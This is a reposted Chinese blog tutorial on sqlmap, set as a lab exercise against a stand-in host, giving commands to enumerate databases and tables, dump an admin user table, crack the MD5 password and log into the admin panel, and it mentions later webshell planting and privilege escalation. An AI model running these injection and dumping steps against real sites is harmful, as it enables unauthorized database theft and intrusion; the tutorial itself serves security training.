sqlmap使用教程【转载】

原文链接:https://www.jianshu.com/p/65d7522ecc1f

检查注入点:

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11 --dbs

爆当前数据库信息:

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11 --current-db

指定库名列出所有表

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables

'vhost48330' 为指定数据库名称

指定库名表名列出所有字段

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

'admin' 为指定表名称

指定库名表名字段dump出指定字段

sqlmap -uhttp://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

'ac,id,password' 为指定字段名称

实验目的:

学会使用sqlmap并完成一次sql注入。

实验工具:

sqlmap、火狐浏览器

实验环境:

服务器一台(Windows server 2003)

客户机一台(Windows server 2003)、目标地址:http://aa.com/wcms/show.php?id=33

实验步骤:

第一步:打开目标地址,先手工检查一下是否存在注入点。

http://aa.com/wcms/show.php?id=33页面正常

http://aa.com/wcms/show.php?id=33'正常报错

说明存在注入漏洞。下面进行sqlmap注入。

第二步:使用sqlmap判断一下是否存在注入漏洞(主要是看能否返回信息)

python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3

image.png

image.png

第三步:获取数据库信息。

python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3--dbs

获取所有数据库信息

image.png

image.png

python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3--current-db

获取当前数据库信息

由于靶机环境搭建了不同的网站和应用,用的都是同一个数据库,因此显示的会把整个mysql的所有数据库名都显示出来。目标网站用的是cms这个库。

第四步:指定库名列出所有表

python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3-D cms --tables

image.png

进一步获取到了cms库所有的表,我们更关注cms_users这个表。根据经验,这里面存储着后台的管理账号和密码。

image.png

image.png

第五步:指定库名表名列出所有字段。

-python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3-D cms -T cms_users --columns

image.png

image.png

查出了3个字段,password,userid,username。理论上password、和username分别存储着密码和用户名。

第六步:指定库名表名字段列出指定字段

python.exe sqlmap/sqlmap.py-uhttp://aa.com/wcms/show.php?id=3-D cms -T cms_users -C username,password --dump

image.png

image.png

在执行过程中,会需要我们属于选择一下y或者n,默认的是大写选项,默认即可(一直按Enter键即可);主要是sqlmap调用本地字典库进行简单的md5暴力破解。我们最后获取到了用户名和密码,分别是 admin 和123456。

第七步:在后台登陆一下。至于后台的查找,我们可以通过御剑这款专业的后台查找工具,后续实验中会有详细的介绍,这里不再赘述。

http://aa.com/wcms/admin/login.php

输入用户名和密码 admin 123456

登陆成功。

关于sqlmap的入侵整个实验过程已经结束,后续的工作就是挂马提权,这些内容也会在后续的实验中进行详细的介绍。

别人家的孩子

https://www.jianshu.com/p/4fb15a2c9040


如有侵权,请联系删除

作者:taiji1985

链接:https://www.jianshu.com/p/65d7522ecc1f

來源:

著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

你可能感兴趣的:(sqlmap使用教程【转载】)